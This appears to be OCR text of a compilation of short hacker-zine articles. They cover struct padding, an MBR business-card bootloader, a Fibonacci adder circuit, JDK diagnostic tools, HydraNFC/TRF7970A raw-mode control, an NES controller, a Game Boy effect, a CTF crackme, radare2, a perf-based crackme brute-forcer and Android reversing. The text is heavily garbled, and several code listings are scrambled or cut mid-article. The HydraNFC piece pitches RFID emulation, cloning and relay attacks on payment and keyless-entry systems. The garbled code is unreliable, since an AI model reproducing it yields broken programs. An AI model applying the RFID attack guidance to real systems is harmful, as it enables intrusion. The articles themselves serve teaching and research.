challenge, but also to BlaTek, Coder and Krzyszt_off for participating. 
Awesome, mind blowing job! 


https://taeril.kraina.org/ 


Does order of variable 
declarations matter? 


Let’s check this in an example in C++ 


struct A { 
char a3 
char b;3 
int cs 
hs 
int main() { 
cout << sizeof(struct A); 


} 


In our structure we have two chars (2 x 1 byte), and 
one int (1 x 4 bytes’). While the total size of 
structure fields is 6 bytes, unexpectedly the 
program printed out that the structure size is “8”. 
What happened? Let's look deeper and check the 
offsets of variables. One possibility is to use GDB 
(version 8.1 or newer). Before that, we need to use 
our structure somewhere, for example by adding 
this simple code to the main function: 


A obj; 
Now, we can debug our program’ with 
gdb --quiet [path to executable file]? and then 


use GDB’s ptype command to show the layout of 
the structure, generated by the compiler: 


(gdb) ptype /o struct A 


/* offset | size */ type = struct A { 
/* () | 1 */ char a; 

/* 1 | 1 */ char b; 

/* XXX 2-byte hole */ 

las 4 | 4 */ int c; 

/* total size (bytes): 8 */ } 


As you can see, there is a 2-bytes gap after the char 
“b”. It is a common practice of data alignment? - it 
can improve performance in some cases, especially 
when you use SIMD‘. 


1. Please note that the size of int depends on the compiler and 
the type of architecture. In our case (x86-64) it’s 4 bytes. 


2 Make sure to add debug information when compiling, in g++ 
or clang++ pass ~g flag for that. 

3. Youcan read more about the topic here: 
https://en.wikipedia.org/wiki/Data_structure_alignment 
https://stackoverflow.com/questions/4306186/structure- 
padding-and-packing 


https://github.com/sergiuszlts 


Does order of variable declarations matter? 


For comparison, let’s change the order of variables 
in our structure: 
struct A { 
char a; 
int c; 
char b; 
}s 
Again, let’s check the offsets: 


(gdb) ptype /o struct A 


/* offset | size */ type = struct A { 
/* 7) | 1 */ char a; 

/* XXX 3-byte hole */ 

/* 4 | 4 */ int ¢; 

/* 8 | 1 */ char b; 

/* total size (bytes): 12 */ } 


Currently, the size of the structure is 12 bytes. In 
this case, a 3-byte gap was created between “a” 
and “c”. The structure itself also has a 3-byte hole/ 
padding at its end. This is useful if we have an array 
of structure objects so all of them start on aligned 
addresses. 

If you need a particular structure layout, for 
example to fit a given protocol, you can use 
Structure-Packing Pragmas® to change alignment. 
For instance, the following code sets the alignment 
to one byte®: 


#pragma pack(1) 


If we place this code before declaring the second 
structure, it will be packed into the following form: 


(gdb) ptype /o struct A 


/* offset | size */ type = struct A { 
/* 7) | 1 */ char a; 
/* 1 | 4 */ int c; 
/* 5 | 1 */ char b; 


/* total size (bytes): 6 */ } 


Now, without alignment the size is exactly what we 
expected at the beginning. ;) 


To sum up, yes, the order of variable declarations is 
relevant. 


4 SIMD (Single instruction, multiple data) is an instructions set 
which allows you to execute the same operation on multiple 
data at the same time. 


5 See: https://gcc.gnu.org/onlinedocs/gcc-9.1.0/gcc/Structure- 
Layout-Pragmas.html 


6 The directive applies to all later struct declarations. You can 
return to previous settings using #pragma pack(). 
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Bootcard 


Bootcard 


tsurai <tsurai@tsunix.de> 


I always loved the weird and obscure side of hacking. 
Thinking outside of the box and creating something that 
was never meant to be and might not even make any 
sense to other people. 

Enter Bootcard, a bootable mini-resume in 16-bit real 
mode assembler code that fits in the master boot record 
and can be printed on a business card encoded as a QR 
code. 


1 Real mode and the master boot record 


All x86 compatible CPUs begin execution of the boot 
sector code in "real mode”. Real mode is a very 
limited 16-bit legacy operating mode that, among other 
things, can only directly address about 1 MB of memory 
and defaults to 16-bit operands. But it also has one 
advantage over the 32-bit protected and 64-bit long 
mode by being able to easily access BIOS functions 
which is the easiest way to print our text to the screen. 

One might think that the BIOS is well behaved and 
specified. Sadly, that is far from reality. Never rely on 
anything and double check everything. 

The second part of our execution environment is the 
master boot record. The classical MBR is a 512 byte 
large area consisting of a 446 byte boot code area, 64 
byte partition table and 2 byte magic signature. Usually 
the code would have to fit into the boot code area, but 
we can use the partition table as well since we have no 
use for it. 


2 Implementation 


The assembly code does not have to do a lot and is 
rather simple. All we need are functions to first, clear 
the screen from previous BIOS output, and to print 
our own data. Luckily the Video BIOS already has 
those accessible via the interrupt 0x10 video display 
functions. ! 

You might be wondering where the actual resume text 
is coming from. It is kept in a file separate from the 
code for better readability and to avoid unnecessary 
recompilation. A plain ASCII encoded text file that is 
being translated into a 32-bit ELF relocatable object via 
objcopy and linked into the .rodata section of the final 
binary. 

But wait, now our text is a readable part of our binary. 
What if someone inspects the image before booting it 
and already sees the content. That’s no fun! So we 
are going to “hide” it by applying a simple XOR cipher. 
That is not really going to fool anyone of course, but at 
least it hides the data from plain sight. 

Finally, the linker script is putting it all together and 
adds the 0x55AA bootsector signature bytes at the offset 
Ox1FE of the binary to construct a valid master boot 
record the BIOS can find and boot. 


Thttp://www.ctyme.com/intr/int-10-htm 
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section .text 
.codel6 
Ljmp $0x0000, $start # canonicalize %cs:%ip 
start: 
mov $0x0002, %ax 


int # set 80x25 text mode 
mov 
mov 
mov 
xor 
int 
xor 
xor 
mov 
int 


$0x10 
$0x0700, %ax 
$0xO0f, %bh 
$0x184F, %Sdx 
%CX, %CX 
$0x10 

%bx, %Sbhx 
Sdx, %dx 
$0x02, %ah 
$0x10 

$0x0e, %ah 

$ binary src data txt 


# clear screen 


# reset cursor pos 


start, %Si 


$ binary src data txt _end, %si 
je .done 
$0x42, %al 
$0x10 


.print 


# print character 


1386-elf-as -o build/boot.o src/boot.S 
1386-elf-objcopy -I binary -B i386 -0 elf32-i386 \ 
--rename-section .data=.rodata \ 
src/data.txt build/data.o 
1386-elf-ld -T src/boot.ld --oformat binary \ 
-o boot.img build/boot.o build/data.o 


With our final binary in hands, all we need to figure 
out is how to distribute it. Some sort of compression 
has to be applied to decrease the size of the code and 
the QR code that is being generated from it. Gzip is an 
obvious candidate, but the resulting compressed archive 
might be too vague for the reader to be recognized as 
such. 

A clever solution has been shown by Alok 
Menghrajani, who managed to put a bootable game 
into a single tweet by using base64 encoding and perls 
character repetition feature.?. The gap between our data 
and the boot sector signature that is being filled with 
NUL bytes, gets translated into a series of ’A’ enabling 
easy compression. 


3 Conclusion 


That is pretty much it. Generate a QR code, put it 


somewhere, and see how many ppl will actually boot it. 
The odds are poor, but it sure 


Dh 


was fun to make. 


Fe eet Bg | 


*https://www.quaxio.com/bootable_cd_retro_game_tweet/ 
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Designing adder circuit for Fibonacci representation 


Designing adder circuit for Fibonacci representation 


Tomasz Idziaszek 
algonotes.com/en/fibonacci-arithmetic 


Fibonacci numbers are defined as follows: 


Fo = 0, Fi =1, Fi, = Fy_-, + Fi_2 for i > 2, 


thus forming an infinite sequence 0,1,1,2,3,5,8,13... 
Any natural number can be represented as a sum of 
distinct Fibonacci numbers, e.g. 7 = 5+2 = Fs + F3. 
Edouard Zeckendorf noticed that as long as we don’t use 
adjacent numbers, this representation is unique. Thus a 
binary string a,_1...@1@9 of length k in which there are 
no adjacent 1s, uniquely represents number 


Qk—1° Pegi t+... +01: F3+ao- Fo. 


There are Fy42 such strings and they represent numbers 
from 0 to Fy42—1. 

We could imagine a computer that stores integers in 
this representation (think that it would improve sturdi- 
ness of punch cards, should such computer use them: no 
adjacent 1s means no adjacent holes). That leads to a 
question: how to perform basic arithmetic operations? 
Let’s start with incrementation by one. To increment 
Qp—1.-.@1a9 and obtain cpcp_1...C1C9, where cy is the 
carry (overflow) flag, it suffices to do the transformation 
a,ag — cco on the last two bits: 


00 + 01 01 — 10 


10> 11 


and leave the remaining bits unchanged. 

Unfortunately, this could lead to a pair of adjacent 1s. 
We can remove it by applying transformation 011 — 100 
from right to left to subsequent triplets of bits. On the 
image below there is a circuit fix that performs such 
transformation and a 5-bit incrementer using it: 


a4 a3 a2a ao 


a2 ai ag | 


fix 


fix 


UUY ix 


fix 
a | 
C5) C4. (C3R—«COCQDsSCCsCCCO) 


ay a, ao 


Addition of two integers az,_1...@ a9 and by_1...b1bo 
is more complicated. After we add them position-wise, 
we could end up with adjacent 1s or even some 2s (but 
only surrounded by Os from both sides). 

First we try to remove 2s (ignoring adjacent 1s). We do it 
from left to right, making sure that we do not introduce 
any new 2s to the left, but we can introduce some new 
2s to the right (and even some 3s, as well as some 2s or 
3s adjacent to 1s, that must be removed in subsequent 
steps). After playing for a while with transformations 
needed, we could obtain the following list: 


020% — 100% 0212 > 1102 
0302 > 110% 012% > 101z 
Here x denotes any digit from {0,1,2} and @=2+1. 


algonotes.com 


In a single step, we need to apply one of these trans- 
formations to a group of four double-bits, which come 
from adding a; + b;. We represent such a double-bit as 
a two-bit integer A;B;, thus first we apply a half adder 
h to them (see image below). 

The circuit fib-adder that selects appropriate transfor- 
mation is a little bit complicated. Note that the leftmost 
double-bit is always in {0,1}, since we already removed 
2s from that part, so we don’t need A3. 


Bz A2 Bz Ai Bi Ao Bo 

| | 
ai b; S Pala + 

a -— +4 
It) 2 : 
Ee ae 

r | Ie | 
A; B; Bi BS Ai Bi Ao Bo 


To construct a multidigit adder we must take care of 
border cases (at both sides of the string). On the left we 
just add bogus 0. On the right we introduce bogus F) 
and Fo. The latter has value 0, so obtained coefficient 
can be ignored, but the former has to be examined. 
After all this we get a string containing only Os and 1s, 
but there could be arbitrarily long strides of adjacent 1s, 
as well as bogus c_; = 1. 

To fix it, we apply a sweep of transformation 011 — 100 
twice. First from left to right, which is equivalent to 
making following transformations for y in {0, 1}: 


yO1750 — y(10)800 =~ y012**10 > y(10)*010 


After that groups of adjacent 1s have length at most 
two. We can remove them by making another sweep from 
right to left. Also co and c_; cannot be simultaneously 
equal to 1, so we can just or them. On the image below 
there is an adder producing cp41C, ...C1¢o for k = 5: 


ba b3 ba bi bo 


a4) 43) 42} G1} ao 


fix 


fix 


fix 


C6 C5 C4 CZ C2 Ci Co 
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A box of tools to spy on Java 


A box of tools to spy on Java. 


OpenJDK has been improving its tools lately and provides us with some powerful spying tools - all of them 
come with man pages, if in doubt take a look there! Some might require the newest JDK - 11. 


jps - launched without any flags it will simply list all Java processes and their pids, but there are some useful 
flags you might want to include, such as - v (lists arguments passed to the JVM), -m (lists arguments passed to 
the main method) or - 1 (shows package names). 


jstack - prints all Java thread stack traces with useful information, such as what state the thread is in and 
what code it’s currently executing. Very useful for identifying deadlocks, livelocks and similar. The states a 
Java thread can be in include (among others) BLOCKED (thread is waiting for entry to a critical section), 
WAITING (thread blocked from code - Object .wait()), TIMED_WAITING (Object.wait() with a timeout 
argument). There is much more useful information, such as daemon_prio (priority inside JVM), os_prio 
(priority in the OS), tid (id of the thread), nid (id of the thread in the OS), address on heap. Especially nid might 
come in useful to use some more advanced OS tools to learn more about the thread. 


jmap - this tool will give you a look into the heap. It can do a heapdump on JDK below version 11, since JDK 
11 you should do that with jcmd (note that dumping the heap causes a “stop the world” event so don’t do 
that on critical processes). Some useful flags include -clstats (display stats for each class), -histo (for 
histogram) and -finalizerinfo (to view classes which are gathered by Garbage Collector but their 
finalize() methods have not been called yet) 


jstat - samples a running JVM for selected metrics. Useful to quickly identify easy-to-spot issues but won’t 
help with more ephemeral ones. Some useful flags include -gcutil (for stats on GC) and 
-printcompilation (displays the last successful JIT compilation). 


jemd - introduced in JDK 7, this tool is the swiss army knife of JVM diagnostic tools - it sends a command to 
a running JVM to accomplish most of what other tools allow for and more. Launched without any commands 
acts as jps. Use jcmd <pid> help to view what commands are available for a given process (as they 
might differ depending on what JVM version is the process running on). 


jhsdb (Java HotSpot debugger) is your go-to tool for post-mortem analysis, introduced in JDK 9. If you 
provide it with a core dump file and a path to the JVM that was used to launch the process it will let you 
launch most of the aforementioned tools on a dead process. Usage: jhsdb jstack| jmap|jinfo 
--core <path-to-core-dump> --exe <path-to-JVM>. It can also be used to debug a living 
process. Remember you need to enable core dumps first (with uLimit). 


java -Xlog gives access to Unified Logging of JVM messages. Using tags, logging levels, decorators and 
selectors it gives you a lot of customization options on what to log. For example, java -Xlog:gctheap 
will give you all the messages that have both the gc and heap tags. Some of the useful things you might want 
to inspect using this tool are: safepoints with java -Xlog:safepoint (safepoints in JVM are 
stop-the-world events where all the threads stop in well-defined spots in order to allow JVM to perform some 
house cleaning, often used by GC), Thread Local Allocation Buffers with -Xlog : tlab, JIT with 
-Xlog:jittinlining, compilation+jit, etc. For more information about the usage, use java 
-Xlog:help. 


Java Flight Recorder, previously a commercial tool from Oracle, is part of OpenJDK since Java 11. It has very 
little overhead, needs to be enabled when starting a java process with java -XX:+FlightRecorder 
-XX:StartFlightRecording=duration=60s, filename=xxx - it dumps a binary file that needs 
to be viewed with Java Mission Control (which is a separate tool, not part of JDK). 


Radostaw Skupnik https://rskupnik.github.io/ 
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Community Advertisement 


TREF7970A 
forgotten features 


for HydraNFC 


The TRF7970A is a_ powerful multi-protocol 
transceiver IC (Integrated Circuit) included in the 
HydraNFC module, that most of its owners only use 
to sniff data exchanged by a 13.56MHz NFC/RFID 
tag and a reader with tools provided in HydraBUS 
firmware. But specifications! show much more abilities 
than people are actually aware of, as this transceiver 
can be fully controlled in low level by an MCU (Mi- 
crocontroller Unit). Moreover, makers and developers 
of HydraNFC/HydraBUS have documented features 
to read and to emulate some types of tags using the 
provided interface of HydraBUS, and by digging in 
their documentations, we can find some examples 
and commands to use default raw mode of this little 
IC?. This mode unleashes awesome possibilities to 
weaponize 13.56 MHz RFID attacks for specific intru- 
sions, or to support various types of cards and readers. 


To use it, a series of steps have to be performed 
through HydraBUS serial interface: 


¢ configure GPIOs for SPI (PA2, PA3, PCO, PC1, 
and PB11); 


enter in bitbang mode; 


e switch into SPI mode and configure SPI frequency, 
polarity and phase, and then the SPI2 speed that 
should be close to specified DATA CLOCK at 2 
MHz as in TRF7970A datasheet; 


e turn on RF and then check if TRF7970A is alive. 


A Python script bbio_hydranfe_init.py? automates 
that process in HydraFW repository. Moreover, a 
project called pynfcreader* has been released to talk in 
low level to some NFC cards by using the HydraNFC. 
These two contributions are very helpful to understand 
how to control the transceiver through the SPI interface. 


Above all, we should at least be aware of the ISO 
Control Register (0x01, 8 bits long), as described in 
the transceiver datasheet (table 5-5)°, to work for 
example as an NFC reader + *0x01=0x88 (active 
mode, no CRC), or emulator > *0x01=0xA4 (ac- 
tive mode, card emulator mode and used protocol). 


thttp://www.ti.com/product/TRF7970A 
https: //github.com/hydrabus/hydrafw/wiki/HydraFW- 
HydraNFC-v1.x-TRF7970A-Tutorial 


TRF7970A forgotten features for HydraNFC 


But we should also be aware of other registers like the 
Modulator and SYS_CLK control (0x09) that set the 
type of modulation and data speed (defined in table 6- 
1), as well as the Chip Status Control register (0x00) to 
set transceiver mode like the interesting Direct Mode 0 
(Raw RF Sub-CarrierData Stream) to encode/decode all 
13.56MHz subcarrier data stream, which is perfect when 
reading non-ISO standard compliant tags for example. 


The following Python 2 code illustrates preliminary 
steps to set the transceiver in emulation mode: 
# from bbio_hydranfc_init.py 
configure_trf797a_gpio() 
enter__bbio() 
bbio_spi_conf() 
bbio_trf7970a_init() 

#4é END 

def sendspi(data, res_len=0x0): 
cs_on() 
# write ’n’ data, read data 
ser.write(”\x05\x00”+chr(len(data))+-chr(res_len)) 
status=ser.read(1) # Read Status 
cmd_check_status(status) 
cs_off() 

sendspi(”\x83”) # power on reset 

# 13.56 MHz SYS_CLK, OOK (100%) Mod type 

sendspi(”\x09\x31”) 

sendspi(”\x01\xa4”) # set emulator mode 

sendspi(”\x41”, 0x1) 

sendspi(”\x00\x21”) # turn RF active 

# 5V operation 

# [other control register here] 

# [machine state to respond] 


Sources of implemented emulators like — hy- 
dranfc_emul_mifare.c could inspire us to implement 
a tag compatible with targeted systems. Of courses, a 
lot of work and tests would have to be performed when 
setting all control registers as well as the state machine 
to talk to the reader. Moreover, in lots of cases when 
the reader is strict with the timing of responses, it is 
better to implement all the emulation in the MCU part. 


The TRF7970A, as integrated in the HydraNFC, is 
already a powerful tool to sniff data, but all of its capa- 
bilities are still underused while it could be a cheaper al- 
ternative to the Proxmark3 for many cases. In addition 
to emulation, cloning and tag reading (even the non-ISO 
standard), the TRF7970A can also be used for relay 
attacks such as those unburied recently for payment sys- 
tems®, and other systems like passive keyless entry and 
start systems’, that do not have a strict timing restraint. 


To finish, it is recommended to read the datasheet 
of this awesome transceiver that is full of surprises and 
could help to create interesting tools when testing or 
attacking RFID/NFC systems. 


Shttps://github.com/hydrabus/hydrafw/blob/master/contrib/bbio_hydranfc/bbio__hydranfc_init.py 


*https://github.com/gvinet /pynfcreader 
5https://datasheet.octopart.com/TRF7970A RHBR-Texas- 
Instruments-datasheet-15828043.pdf 


https://twitter.com/FIUxluS 


Shttps://salmg.net/[...]/intro-to-nfc-payment-relay-attacks/ 
“http: //s3.eurecom.fr/docs/ndss11_francillon.pdf 


Sébastien Dudek (@FIUxluS) 


SAA-ALL 0.0.5 


Build your own controller for NES! 


Build your own controller for Pegasus (NES clone) ! 


The article covers the communication 
protocol between the controller and the 
console, and a PoC implementation of a simple 


controller built using ATmega8A. 
Pegasus features two DB9 male ports on the 


The protocol described previously is akin to 


SPI. We can use this fact to utilize the SPI 
HW block in slave mode. MISO can be used as 
DATA. Similarly, SCK can be used as CLOCK. An 


SPI slave needs to have SS asserted for all 


front of the console to support swappabl 
controllers. Simplified pinout of the port can 
be seen in the corresponding diagram. 


Legend: 

- HC 
DATA (in) 
STROBE (out) 
CLOCK fout) 
N/C 
+59 fout) 
H“C 
GHD fout) 
HYC 


0 00 J 05 OF be bo Bo 


Inputs and outputs are described in regards 
to the console. Obviously, a female plug of 
the controller needs to be mirrored. 

+5V and GND are power lines. Th console 
acts as a master, shifting out bits on DATA, 
where ,0” implies a button press. Each bit 
gets acknowledged by a tick on CLOCK. Before 
the start of transmission, a signal on STROBE 
is sent to update the shift register with the 


current state of buttons. A transmission 
example can be seen in the corresponding 
diagram. 


the time the transmission takes place. We can 
use STROBE to generate the proper SS signal on 
a GPIO pin. To be sure we do it fast enough, 
we connect STROBE to INTO (PD2) and handle the 
proper ISR. As the aforementioned GPIO we’1l 
use PBl by strapping it to SS (PB2). 

Crucial excerpts from the PoC implementation 
can be seen below. Implementation of GPIO 
macros is left as an exercise for the reader. 


#include 
static uint8 t shift data = Oxff; 
static void shift _init (void) ; 
int main(int argc, char *argv[]) 
{ 
shift_init(); 
// input with a pull-up 
gpio_cfg_inp (BUTTON) ; 
sel(); 
while 
{ 
// handle GPIO buttons 
if (0 == gpio_get (BUTTON) ) 
{ 


(1) 


strobe 


aes | 


| | | 


data 


Bits on DATA denote the following buttons, 
consecutively: A, B, Select, Start, Up, Down, 
Left and Right. In the diagram the A button is 
pressed, any other button is released. 

Timing of the signals is not defined per se, 
but you can use the following as reference: 

. positive STROBE impulse width - 4.5 us, 

° time distance between positive edges of 


consecutive STROBE impulses - 20 ms (50 Hz, 
compare with the frame rate of PAL), 

° negative CLOCK impulse width - 0.58 us, 

° time distance between negativ dges of 
consecutive CLOCK impulses - 15.79 us, 

° response delay - 120 ns. 


Response delay is the time after which DATA 
sets its state accordingly to STROBE or CLOCK 
changes. Th stat of DATA may change on a 
positive edge of STROBE or CLOCK. 

In order to implement the protocol above we 
could buy a chip with a built-in shift 
register and interface it to an MCU, but it 
would be no fun. Let's try to use our MCU to 
the fullest. 

The naive approach to the challenge would 
utilize GPIO bit-banging. There is a major 
issue with this idea as the required timing is 
strict. CPU stress would be high enough to 
stop us from doing tasks such as USB handling. 


Szymon Morawski 
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shift_data = (uint8_t) ~_BV(BTN A); 
_delay_ms (200); 
shift data = Oxff; 
} 
} 
return 0; 


} 
ISR(INTO_vect) 


{ 


// on the rising edge of STROBE 


gpio_set(FORCE_SS); 
SPDR = shift data; 
gpio_clr(FORCE_SS); 
} 
ISR(SPI_STC_vect) 
{ 
/* vestore SS to high after transaction */ 
gpio_set(FORCE SS); 


} 
static void shift init (void) 


{ 


gpio_cfg_inz(STROBE); // hi-Z input, PD2 
gpio_cfg_out(FORCE SS); // output, PB1 

/* note that PBl is strapped to SS (PB2) */ 
MCUCR |= _BV(ISCO1) | _BV(ISCOO); 

GICR |= _BV(INTO); 

gpio_cfg_out (DATA); // MISO, PB4 

SPCR |= _BV(SPE) | _BV(CPOL) | _BV(SPIE); 


Wobble the 
Nintendo logo on 
the Game Boy 


by Felipe Alfonso - bitnenfer 


This is a very simple but fun effect that can be 
achieved in just a couple of lines of assembly. This 
effect is done using the same Nintendo logo that is 
left on VRAM by the boot rom. In our program we 
change the horizontal and vertical scroll for each 
scan line of the LCD using a lookup table. For this, 
we only need a toolchain that outputs instructions 
for the Sharp LR35902 CPU. RGBDS 
(https://rednex.github.io/rgbds/) will be our 
weapon of choice. It includes an assembler, linker 
and rom header fixer. 


section "HEADER", ROM@[$0100] 
nop 
jp wobble_main 


db $CE,$ED,$66,$66,$CC,$0D, $00, $0B 
db $03,$73,$00,$83,$00,$0C,$00,$@D 
db $00,$08,$11,$1F ,$88,$89,$00,$0E 
db $DC,$CC,$6E,$E6,$DD,$DD, $D9, $99 
db $BB,$BB,$67,$63,$6E,$0E,$EC,$CC 
db $DD,$DC,$99,$9F,$BB, $B9, $33,$3E 
db "WOBBLE", $00 
5 Entry point 
section "WOBBLE", ROM@[$0150] 
wobble_main: 


ld e,$00 


ld h,$20 
wobble_loop: 


ld b, $00 
-inner_loop: 


ldh a, [$44] 


twitter.com/bitnenfer 


Wobble the Nintendo logo on the Game Boy 


cp b 

jr nz,.inner_loop 
ld a,b 

inc b 

add a,e 

and $1F 


ld l,a 
ld a, [hl] 


ldh [$43],a 
ld a,l 

add a,$@9 
and $1F 

ld l,a 

ld a,[hl1] 


ldh [$42],a 
Idh a, [$44] 


cp $90 
jr nz,.inner_loop 


inc e 
jr wobble_loop 


section "WOBBLE_DATA", ROM@[ $2000] 
db $00, $00,$01,$01,$02,$02,$02,$02 
db $02,$02,$02,$02,$01,$01, $00, $00 
db $00,$00,$FF,$FF,$FE,$FE,$FE,$FE 
db $FE,$FE,$FE,$FE,$FF,$FF,$00,$00 


For compiling this with RBGDS we use the 
following commands: 


rgbasm -o wobble.o wobble.asm 

rgblink -o wobble.gb wobble.o 

rgbfix -v -p® wobble.gb 
Now that the rom is built we can run it on the BGB 
emulator or a physical system. Sadly it won’t work 
with a Game Boy Color because that system clears 
the logo from VRAM after booting up. 


Felipe Alfonso 
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HOW TO: unboringly tease GoogleCTF 2019 


Reverse Engineering 


HOW TO: unboringly tease Google CTF 2019 


HOW NOT TO: introduce into python 


1 Introduction 


Last year’s Google CTF’s Beginners Quest! did not 
introduce into reverse engineering very well. Unfor- 
tunately there were two RE-challenges and only one 
of them, called GATEKEPPER? , with the potential 
to get you in touch with a disassembler. Most video 
write-ups, I have seen 34°, did not take a look into the 
assembly or the algorithm itself, because it was not 
necessary and they caught the password almost im- 
mediately. What a pity! How could this be and does 
it give a good introduction into the topic of reverse 
engineering? 


2 Problem 


Because the encoded password was stored within the 
binary, you got your attack vector. In my opinion, the 
chosen password was way too trivial and so the rever- 
sed leetspeak phrase ,,zLllks_d4m_t0g_I“ kind of aler- 
ted everybody. Not real reversing but literally simple 
reversing was involved to get to the flag. There was a 
big unused potential within this task. It was small and 
commonly compiled code, to easily reverse and un- 
derstand the algorithm, instead of guessing the right 
answer. I heavily thought about how to use this good 
potential and gave it a try patching it. 


‘https: //github.com/google/google-ctf/tree/master/ 
2018/beginners 
*https://github.com/google/google-ctf/blob/master/ 
2018/beginners/re-gatekeeper/attachments/gatekeeper 
Shttps://www. youtube. com/watch?v=bshuAGkgY3M 
“https: //www. youtube. com/watch?v=qDYwclf0LZw 
5https://www.youtube.com/watch?v=WUOMnLWKFre 
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3 Solution 


I just tinkered a little bit inside the binary, closed 
the backdoor and let you peek into crucial changes 
being made. You should be unable to simply reverse 
the patch. I think it is still easy but hopefully not as 
quickly solvable as last time. Perhaps you will learn 
at least something new from the modified challenge. 


4 Task 


The home owners put another cake in the fridge, not 
before fixing some issues and patching the software. 
Thanks to our surveillance team, we just intercepted 
some parts of the current patch. 


#! /us..bin/..thon 

f = open(’gatekeeper’, ’rt+b’) 
f.s.ek(Oxde0) 
f.wr..e(b’S..Wh..e’) 
f£.seek(0xe01) 
f..rite(b’s..cr..E..1k..rc’) 
..see. .0xb29) 
f.write.b.\x..’) 


Good luck and lots of fun using your prefered disas- 
sembler to reverse some x86° opcodes. Experienced 
players must not use the given link and instead di- 
sassemble the binary stored in olly’s magical backup 
patterns. With pen and paper only, of course! ;P. So- 
lutions you could mailto:idandre@hotmail.de. Do 
you feel like playing more CTFs? Let’s meet June 22 
at Google CTF 20197! 


Shttps://github.com/idandre/gatekeeper-2.git 
Thttps://g.co/ctf 
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HOW TO: easily get started with radare2 


HOW TO: easily get started with %IK< 


HOW NOT TO: learn x86 assembly language 


Basic Concepts 


To open a file in write mode, type: 
r2 -w file 


Welcome to the r2 command line. To understand r2 
better I will introduce some concepts first. 12 has 
a seeker which points to the virtual memory address 
shown inside the square brackets. 


[0x00000b10] > 
If you need some help use the command ?. 


[0x00000b10]> ? 


| s[?] [addr] seek to address ... 


Do you need some more help with a specific command? 
Just append ? to it. 


[0x00000b10]> s? 
ls Print current address ... 


Unlike most OS terminals, the command names are ex- 
tremely puritanical and most of them are abbreviations 
of the actions you would like to perform. So do not be 
surprised about commands like: 


[0x00000b10]> wtf! aF1L3 


Evil to him who evil thinks, because it just (w)rites (t)o 
the (f)ile aF1L3 from current address 0xb10 to the end 
of the mapped memory. This greatly speeds up the 
analysis process, but on the other hand, it takes a lot 
of time to learn it and even more to master. 


Visual Mode 


You can switch to visual mode with the command V and 
come back to the command line mode by pushing [q]. 
In visual mode, you can scroll up and down in a vim-like 
fashion with [j] and [k], as well as enter the command 
line by pushing key [:]. While moving up and down, 
the seeker is updated to the very top memory address 
shown. There are five different print modes which can 
be changed by [p] and [P]. Most of the time reversing 
code, I work in the third, the debugger mode. To auto- 
matically analyse the main function push [:], then type 
the command af@main. Now push [V] to switch to the 
interactive Ascii Art graph which displays a flowchart 
of the analysed function. Move around with [h][{j][k][l]. 
Zoom in with [+], zoom out with [-] and zoom to 100% 
with [0]. If you would like to get some help, just push [?] 
as usual. Rotate through five different modes with [p] 
and [P]. To highlight text, use [/] and type in the text 
you want to be shown highlighted. 


https://youtube.com/channel/UCej7jrdKOsjTTi.GuaWFKcA 


Binary Patching 


The following command (p)rints a he(x)dump of size 
0x8 at the address appended by @. 


:> px 0x8 @Oxde0 


OxdeO 306e 335f 5734 724d On3_W4rM 


How to (w)rite a (z)ero terminated string at address 
Oxde0? 


:> wz SnwWhite @0Oxde0O 


Just push [A] in visual mode to (w)rite some 
(a)ssembler, or use the command line with key [:]. 


:> wa mov edi, O @0xa24 


Debugging 


For debugging a file in r2, you need to use option -d. 
r2 -d file 


To add a (d)ebug (b)reakpoint at the address sym.main 
plus offset 0x1a0 just type: 


db sym.main+Ox1a0 


In visual mode, you simply push [s] to move the CPU 
register RIP one (d)ebug (s)tep forward. Or you can 
assing a new value to the (d)ebugged (r)egister RAX: 


ds; dr rax = 0x12345678 


Misc 


There is one more thing worth mentioning. After I 
started working with r2, I always opened a python con- 
sole for calculations. At that time I did not know that 
there was a much more elegant and easy way. 


:> ?v OxdeadO000 + Ox0000beef 
Oxdeadbeef 


Are you tired and have enough for today? So let’s (q)uit 
and take a rest. To see radare2! in action, you might be 
interested in watching a more comprehensive youtube 
tutorial”. 


lhttps://www.radare.org 
*https://www. youtube. com/watch?v=huf gzz8nwNw 
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Crackme Solving for the Lazies 


Because nobody has time to waste on petty 
crackmes during CTF, here are two simple 
side-channels-based tricks to quickly solve the 
boring ones: The first is for when you know what 
part of the code is used to display the flag, while the 
second is for things that you don’t even want to 
look at. 


Coverage-guided solving 


Open the binary in your favorite hex editor, which 
should of course be radare2, and patch the 
instructions that are displaying the flag with xor 
eax, eax; mov eax, [eax]; essentially a NULL 
pointer dereference leading to a crash. The final 
step is to throw the modified binary at a 
coverage-guided fuzzer like AFL, and to wait for it to 
trigger a crash: the corresponding input is usually 
the flag you’ re looking for. 


Performance-guided solving 
The second trick is a bit similar, but instead of trying 


to maximize the coverage to eventually find the flag, 
we’re aiming at maximizing the number of executed 


#!/usr/bin/env python3 
import string, shlex, sys 


from subprocess import Popen, PIPE 


cmd = 'perf stat -r 25 -x, -e instructions:u %s 
key = of 
while True: 


maximum = 0,@ 
for i in string.printable: 
E = 
_, stdout = 
nb_instructions = 


cmd + shlex.quote(key+i) + 
Popen(c, stderr=PIPE, shell=True).communicate() 
int(stdout.decode(‘utf-8').split(',')[@]) 
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instructions: simple crackmes will often bail out as 
soon as possible when checking their input. For 
example, when naively comparing two strings, they 
will stop at the first differing character. So the more 
characters we’re able to guess, the more 
instructions will be executed 


This approach has the nice side effect (pun 
intended) of guessing the flag character by 
character, like in the movies! 


On Linux, measuring all sorts of low-level metrics 
can be done via the performance counters 
infrastructure, exposed to userland via the perf 
toolsuite. This can easily be wrapped in some 
Python, as in the script below, to provide a 
simple-yet-effective bruteforcer. An important 
detail to consider is the -r parameter, controlling 
how many times the binary is run before taking the 
mean value. Without setting it to a “large” (~10) 
value, other processes’ noise will likely skew our 
measurements. 


Moreover, should a given metric, like the number of 
executed instructions, not yield the flag, it might be 
worth trying different ones, like number of executed 
branch instructions, cache-misses of various levels, 
cpu-cycles, memory-accesses, number of 
speculatively executed branches, ... side channels 
are everywhere, you just have to find them! 


% sys.argv[1] 


" >/dev/null' 


if nb_instructions > maximum[@]: 
maximum = nb_instructions, i 


key += maximum[1] 
print(key) 


Julien Voisin 


CC BY-SA 4.0 


dustri.org 
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Android Reverse 
Engineering! 


Have you ever wondered why there’s so many 
cracked apps out there? Well, because Android 
Reversing is simple. OK, it’s not that simple, but 
most of the developers don’t care and thus make 
the job of reverse engineers easier, because they 
don’t add any protection. You can argue, that the 
more popular the app is, the better protected it is. 
Keep that in your mind, when picking your target. 
First of all, you'll need some tools, because you 
certainly don’t want to do everything from scratch. 
These are the tools we will be using throughout 
the article: 

- apktool 

- dex2jar 

-  jdgui 

- bytecodeviewer 
